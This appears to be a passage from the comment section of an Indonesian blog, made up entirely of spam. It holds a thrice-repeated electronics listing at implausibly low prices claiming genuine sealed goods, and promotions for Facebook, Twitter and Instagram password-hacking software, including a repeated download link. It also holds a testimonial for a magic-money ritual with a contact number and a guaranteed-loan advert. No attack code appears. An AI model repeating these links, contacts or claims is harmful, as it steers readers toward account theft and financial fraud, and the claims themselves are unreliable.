BlackBerry Bold 9780 Onyx 2.Rp.800.000,-
Ready Stock!
Blackberry Curve 9320.Rp.700.000,-
Ready Stock!
Samsung Galaxy Note 10.1.Rp.2,500.000.
Ready Stock!
Samsung Galaxy Tab 2 (7.0).Rp. 1.000.000
Ready Stock!
Samsung Galaxy S III Mini.Rp.1.800.000.
Ready Stock!
Samsung Galaxy Nexus I9250 - Titanium Si.Rp.1.500.000,-
Ready Stock!
Samsung Galaxy Note N7100.Rp.2.500.000.
Ready Stock!
Samsung Galaxy Note N7000 - Pink.Rp.1.700.000.
Ready Stock!
Samsung Galaxy Y S5360 GSM - Pure White.Rp.500.000,-
Ready Stock!
Nokia Lumia 800 - Matt Black.Rp.1.700.000,-
Ready Stock!
Nokia Lumia-710-whiteRp. 900.000,-
Ready Stock!
Nokia C2-06 Touch & Type -Dual GSM-Rp.450.000,-
Ready Stock!
Nokia Lumia 710 - Black.Rp. 900.000,-
Ready Stock!
Apple iPhone 4S 16GB (dari XL) - Black.Rp.1.200.000,-
Ready Stock!
Apple iPhone 4S 16GB (dari Telkomsel).Rp.1.200.000,-
Ready Stock!
Apple iPod Touch 4 Gen 8GB.Rp.700.000.
Ready Stock!
APPLE iPod Nano 8GB - Pink.Rp.500.000,-
Ready Stock!
Acer Aspire 4755G Core i5 2430 Linux Blue.Rp 1.700.000.
Ready Stock!
Acer Aspire One AOD270 10.1.-Rp. 1.000.000,-
Ready Stock!
Acer TravelMate TM8481-2462G32.Rp. 1.400.000
Ready Stock!
Acer ICONIA Tab W500 10.1" Tablets Notebook.Rp. 1.100.000,-
Ready Stock!
Nikon D7000 kit 18-105mm.Rp.1.700.000.
Ready Stock!
Nikon D90 Kit 18-105mm Vr.Rp 1.300.000.
Ready Stock!
Nikon Coolpix L 120 Red.Rp. 900.000
Ready Stock!
Nikon Coolpix P 500 Black.Rp 1.000.000

NABILA SHOP mengatakan...

Produk dijamin asli orginal.Dapatkan harga promo Nabila Shop : Barang yang Kami Tawarkan Semuanya Barang ASLI ORGINAL Ada Garansi Resmi Distributor dan Garansi TAM 2 bebas resiko bebas penipuan.
Semua Produk Kami Baru dan Msh Tersegel dLm BOX_nya.
BERMINAT HUB-SMS 085-757-299-675 ATAU KLIK WEBSET RESMI KAMI http://nabilashop77.blogspot.com/.

Ready Stock!
Samsung Galaxy S4 Mini Rp.2,500.000
Ready Stock!
Apple iPhone 5 Rp.2,700.000
Ready Stock!
BlackBerry 9380 Orlando - Black.Rp.900.000,-
Ready Stock!
BlackBerry Curve 8520 Gemini.Rp.500.000,-
Ready Stock!
BlackBerry Bold 9780 Onyx 2.Rp.800.000,-
Ready Stock!
Blackberry Curve 9320.Rp.700.000,-
Ready Stock!
Samsung Galaxy Note 10.1.Rp.2,500.000.
Ready Stock!
Samsung Galaxy Tab 2 (7.0).Rp. 1.000.000
Ready Stock!
Samsung Galaxy S III Mini.Rp.1.800.000.
Ready Stock!
Samsung Galaxy Nexus I9250 - Titanium Si.Rp.1.500.000,-
Ready Stock!
Samsung Galaxy Note N7100.Rp.2.500.000.
Ready Stock!
Samsung Galaxy Note N7000 - Pink.Rp.1.700.000.
Ready Stock!
Samsung Galaxy Y S5360 GSM - Pure White.Rp.500.000,-
Ready Stock!
Nokia Lumia 800 - Matt Black.Rp.1.700.000,-
Ready Stock!
Nokia Lumia-710-whiteRp. 900.000,-
Ready Stock!
Nokia C2-06 Touch & Type -Dual GSM-Rp.450.000,-
Ready Stock!
Nokia Lumia 710 - Black.Rp. 900.000,-
Ready Stock!
Apple iPhone 4S 16GB (dari XL) - Black.Rp.1.200.000,-
Ready Stock!
Apple iPhone 4S 16GB (dari Telkomsel).Rp.1.200.000,-
Ready Stock!
Apple iPod Touch 4 Gen 8GB.Rp.700.000.
Ready Stock!
APPLE iPod Nano 8GB - Pink.Rp.500.000,-
Ready Stock!
Acer Aspire 4755G Core i5 2430 Linux Blue.Rp 1.700.000.
Ready Stock!
Acer Aspire One AOD270 10.1.-Rp. 1.000.000,-
Ready Stock!
Acer TravelMate TM8481-2462G32.Rp. 1.400.000
Ready Stock!
Acer ICONIA Tab W500 10.1" Tablets Notebook.Rp. 1.100.000,-
Ready Stock!
Nikon D7000 kit 18-105mm.Rp.1.700.000.
Ready Stock!
Nikon D90 Kit 18-105mm Vr.Rp 1.300.000.
Ready Stock!
Nikon Coolpix L 120 Red.Rp. 900.000
Ready Stock!
Nikon Coolpix P 500 Black.Rp 1.000.000

NABILA SHOP mengatakan...

Produk dijamin asli orginal.Dapatkan harga promo Nabila Shop : Barang yang Kami Tawarkan Semuanya Barang ASLI ORGINAL Ada Garansi Resmi Distributor dan Garansi TAM 2 bebas resiko bebas penipuan.
Semua Produk Kami Baru dan Msh Tersegel dLm BOX_nya.
BERMINAT HUB-SMS 085-757-299-675 ATAU KLIK WEBSET RESMI KAMI http://nabilashop77.blogspot.com/.

Ready Stock!
Samsung Galaxy S4 Mini Rp.2,500.000
Ready Stock!
Apple iPhone 5 Rp.2,700.000
Ready Stock!
BlackBerry 9380 Orlando - Black.Rp.900.000,-
Ready Stock!
BlackBerry Curve 8520 Gemini.Rp.500.000,-
Ready Stock!
BlackBerry Bold 9780 Onyx 2.Rp.800.000,-
Ready Stock!
Blackberry Curve 9320.Rp.700.000,-
Ready Stock!
Samsung Galaxy Note 10.1.Rp.2,500.000.
Ready Stock!
Samsung Galaxy Tab 2 (7.0).Rp. 1.000.000
Ready Stock!
Samsung Galaxy S III Mini.Rp.1.800.000.
Ready Stock!
Samsung Galaxy Nexus I9250 - Titanium Si.Rp.1.500.000,-
Ready Stock!
Samsung Galaxy Note N7100.Rp.2.500.000.
Ready Stock!
Samsung Galaxy Note N7000 - Pink.Rp.1.700.000.
Ready Stock!
Samsung Galaxy Y S5360 GSM - Pure White.Rp.500.000,-
Ready Stock!
Nokia Lumia 800 - Matt Black.Rp.1.700.000,-
Ready Stock!
Nokia Lumia-710-whiteRp. 900.000,-
Ready Stock!
Nokia C2-06 Touch & Type -Dual GSM-Rp.450.000,-
Ready Stock!
Nokia Lumia 710 - Black.Rp. 900.000,-
Ready Stock!
Apple iPhone 4S 16GB (dari XL) - Black.Rp.1.200.000,-
Ready Stock!
Apple iPhone 4S 16GB (dari Telkomsel).Rp.1.200.000,-
Ready Stock!
Apple iPod Touch 4 Gen 8GB.Rp.700.000.
Ready Stock!
APPLE iPod Nano 8GB - Pink.Rp.500.000,-
Ready Stock!
Acer Aspire 4755G Core i5 2430 Linux Blue.Rp 1.700.000.
Ready Stock!
Acer Aspire One AOD270 10.1.-Rp. 1.000.000,-
Ready Stock!
Acer TravelMate TM8481-2462G32.Rp. 1.400.000
Ready Stock!
Acer ICONIA Tab W500 10.1" Tablets Notebook.Rp. 1.100.000,-
Ready Stock!
Nikon D7000 kit 18-105mm.Rp.1.700.000.
Ready Stock!
Nikon D90 Kit 18-105mm Vr.Rp 1.300.000.
Ready Stock!
Nikon Coolpix L 120 Red.Rp. 900.000
Ready Stock!
Nikon Coolpix P 500 Black.Rp 1.000.000

cara hack facebook mengatakan...

patut dicoba ..

this profitable mengatakan...

Udah ada yg nyobain software hack di www.INDONESOFT.net apa blm nih?
Kmrn ane beli software hack Fb, twitter ama instagram disitu
Kl ada yg udah beli juga, ane minta diajarin software yg nmr 4 dong,
hehe maklum newbie...
Untuk software yg ke 1,2 ama 3 udah sukses ngedapetin password"nya

Clash Of Clans YT mengatakan...

Download New Facebook Account Hacker 2015 Free Working Here:

http://dlhack.com/download/facebook-account-hacker


http://dlhack.com/download/facebook-account-hacker


http://dlhack.com/download/facebook-account-hacker


http://dlhack.com/download/facebook-account-hacker



http://dlhack.com/download/facebook-account-hacker


http://dlhack.com/download/facebook-account-hacker



http://dlhack.com/download/facebook-account-hacker


http://dlhack.com/download/facebook-account-hacker



http://dlhack.com/download/facebook-account-hacker


http://dlhack.com/download/facebook-account-hacker


http://dlhack.com/download/facebook-account-hacker



http://dlhack.com/download/facebook-account-hacker

Pak JUNEDI DI BALI mengatakan...

Assalamualaikum Salam sejahtera untuk kita semua, Sengaja ingin menulis
sedikit kesaksian untuk berbagi, barangkali ada teman-teman yang sedang
kesulitan masalah keuangan, Awal mula saya mengamalkan Pesugihan Tanpa
Tumbal karena usaha saya bangkrut dan saya menanggung hutang sebesar
1M saya sters hampir bunuh diri tidak tau harus bagaimana agar bisa
melunasi hutang saya, saya coba buka-buka internet dan saya bertemu
dengan KYAI SEMPONO, awalnya saya ragu dan tidak percaya tapi selama 3 hari
saya berpikir, saya akhirnya bergabung dan menghubungi KYAI SEMPONO
kata Pak.kyai pesugihan yang cocok untuk saya adalah pesugihan
penarikan uang gaib 4Milyar dengan tumbal hewan, Semua petunjuk saya ikuti
dan hanya 1 hari Astagfirullahallazim, Alhamdulilah akhirnya 4M yang saya
minta benar benar ada di tangan saya semua hutang saya lunas dan sisanya
buat modal usaha. sekarang rumah sudah punya dan mobil pun sudah ada.
Maka dari itu, setiap kali ada teman saya yang mengeluhkan nasibnya, saya
sering menyarankan untuk menghubungi KYAI SEMPONO Di Tlp 0852-2589-0869
agar di berikan arahan. Supaya tidak langsung datang ke jawa timur,
saya sendiri dulu hanya berkonsultasi jarak jauh. Alhamdulillah, hasilnya sangat baik,
jika ingin seperti saya coba hubungi KYAI SEMPONO pasti akan di bantu Oleh Beliau

Katherine Felix mengatakan...

If you are dealing with financial contingencies and searching for the best loan option, guaranteed loans are the right choice. Lenders Club serves these loans on credible offers to tackle the financial obligations. The loans are easy to get and the entire process of securing funds is online.

«Paling tua ‹Lebih tua   201 – 220 dari 220   Lebih baru› Terbaru»

Posting Komentar